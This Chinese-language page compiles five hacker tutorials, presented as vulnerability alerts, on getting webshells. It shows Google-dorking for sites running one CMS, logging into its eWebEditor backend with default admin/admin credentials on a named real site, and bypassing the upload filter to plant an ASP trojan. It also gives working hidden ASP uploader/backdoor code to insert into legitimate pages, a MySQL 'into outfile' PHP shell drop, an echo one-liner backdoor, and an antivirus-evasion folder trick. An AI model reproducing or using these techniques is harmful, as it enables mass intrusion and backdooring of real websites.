玩一场webshell游戏漏洞预警(共5篇)由网友“你留在盛夏”投稿提供,下面给大家分享玩一场webshell游戏漏洞预警,欢迎阅读!
篇1:玩一场webshell游戏漏洞预警
向 x档案投了稿,两个月了,还没选上,现在就发出来了
随便看一下吧,文章不怎么样,别见笑,图片是缩小的,点一下图片就可以看大图了
玩一场webshell游戏
大漠(baiker)
现在许多的小菜,说起抓鸡,就要来搞webshell,但是对于小菜来说,显得比较为难。虽然说每期都介绍了一些漏洞的利用工具。可能有一些,但是有大多数的“有良心”的大哥给挂马了。说不定你的机子就给马给“吓死了“。
还有就是网上翻版的教程,什么“or”漏洞,挖掘机挖上传页面什么的,或许你就因此”中马率“很高,说真的网上的一些教程都是千篇 一律的,既费时间,有搞不了多少webshell。现在我们来自己动手找webshell。
一.下载源码
找一些下载量大的网站去下载asp源码,尤其是可以搜索源码简介的网站,比如说找在线编辑器什么的,我们可以到www.zzcode.com和cncode去下载,找一个人气好,下载量大的网站整站程序。现在我们来看一下有一个向日葵整站程序,我是用ewebeditor搜索的,看点击人数有207497,(图1)下载量我想一定不是很差的,算是下载的有80%,就有16万了
,算用来建站的有80%中的50%,那么也有8万了,算是有管理员改了默认页面的,也有好几万的了,说起来,数量还是挺可观的了,嘿嘿................
二.本地架设asp环境
下载好源码后,就该来架设asp环境了。我们下载asp旋风小子。NEXT一路下去,单击完成,咦,怎么办呢?(图2)
那么我们就去C:\Program Files\小旋风AspWebServer目录找到main.box,用记事本打开,把80改为任意系统没有用的端口,如8000.文件--保存,就可以了,(图3)
首先试验一下,桌面启动AspWebserver,托盘会一闪一闪的,输入127.1:8000/index.asp,成功了。(图4)
然后将源码的根目录复制到wwwroot目录里,同时覆盖原来的测试文件index.asp,同样输入127.1:8000/index.asp就可以看到这向日葵整站程序的首页了,界面不是太难看,
(图5)
用浏览器的viewpage功能看一下页面的链接情况,看到了一个特殊的,more.asp?typeid 记下来,(图6)
再看一下页面的版权什么的,有-2008 管理入口(图7)
三.to get webshell
现在开始开工了。刚才在主页找到了向日葵系统的主要特征,现在就来google一下,inurl:“more.asp?typeid”= 2004-2008 管理入口 狂晕,才450项,(图8)
不过足够了,成功率一般是90%左右,先来搞一个就随便拿一网站来来测试,就拿我们的地球网站吧,呵呵。把more.asp及后面的改为eWebEditor/admin_login.asp,也就是把www.xpxx.cn/jb/mmj/more.asp?typeid=28改为www.xpxx.cn/jb/mmj/eWebEditor/admin_login.asp,(图9)
默认密码进去了,相信大家都知道怎么去拿webshell了。(图10)
首先去拷贝一样式,进入设置,将图片的上传格式加上aaspsp,过滤后就是asp格式了,然后去预览,点击图片上传,asp木马就可以上传了,单击“代码”,就可以看到马的地址了。(图11-12)
现在有google工具来搞一下,这是我一朋友写的,功能虽然不是太全,但是比起simplegoogle(以前介绍过)来说要好点,simplegoogle不能去除替换好后的重复的url地址。我们来动手来一下关键字出输入inurl:“more.asp?typeid”= 2004-2008 管理入口,将more.asp替换为ewebeditor/admin_login.asp,这是默认的ewebeditor后台,用户和密码是admin/admin,导出来,随便拿一个测试就可以了,是不是挺方便的?
四.小结
找webshell还是自己动手的好,虽然说这方法用来抓鸡挺快的,不过还是自己能找网站程序的漏洞,并且能够编写利用工具才是王道,自己写一个0day,然后发布出去,做做大虾的滋味,岂不快哉?
篇2:隐藏的WEBSHELL漏洞预警
<%if request.QueryString(“hac”)=“ker” then
a=Request.TotalBytes:if a Then b=“adodb.stream”:Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB
(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-
3:h.Position=0:h.type=2:h.CharSet=“BIG5”:i=h.Readtext:h.close:j=mid(i,InstrRev(i,“\”)+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-
2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%>
type=submit>
<%end if%>
表面看是没什么区别的 这就是隐藏的WEBSHELL
只要这样:login.asp?hac=ker
篇3:GET PHPCMS WEBSHELL漏洞预警
进去后
Create TABLE b (cmd text NOT NULL);
Insert INTO b (cmd) VALUES('
//在字段cmd中插入一句话木马,木马内容为
前3句都≈葱谐晒ψ詈笠痪渲葱泻笙允究瞻
select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';
篇4:旁注Echo出目标站WebShell漏洞预警
命令格式
Echo 语句 >目标站绝对目录
例如:
echo ^<^%execute request(“0”)^%^>>D:\03389.com\wwwroot\YingMu.asp
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥
篇5:三种隐藏Webshell的方法漏洞预警
作者:普瑞斯特
第一种:
在我们要做手脚的asp文件里加入如下内容
<%if request(“action”)=“ok” then%>
shell代码插在这里
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可
第二种:
在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString(“filer”)
set objStream = Server.createObject(“ABODB.Stream”)
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath(“hacksb.asp”),2
%>
访问的时候在做手脚的asp文件后面加上?filer=xxx,
xxx为你本地上传的一个路径如C:\hacksb.asp,
上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp
第三种:
前提得到system权限,
进入网站目录下一层
mkdir s…
copy hacksb.asp s…/
这样杀毒软件找不到的
访问网站/s…/hacksb.asp即可
【玩一场webshell游戏漏洞预警(共5篇)】相关文章:
FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警2023-08-07
一个防注入的小白错误千博企业程序漏洞预警2022-09-25
教你做服务级的木马后门2023-07-09
确保PHP应用程序的安全[2]WEB安全2022-04-30
NC反弹CMDSHELL提权总结2022-12-15
linux当mysql以root权限登录时提权网站安全2023-08-17
IIS Web服务器易忽视的六大基本安全风险2023-04-08
NFS服务器安全的解析和解决2024-04-10
科讯CMS V7.0 安全设置说明详解2023-08-19
从曲折到成功的实例入侵思路2023-01-14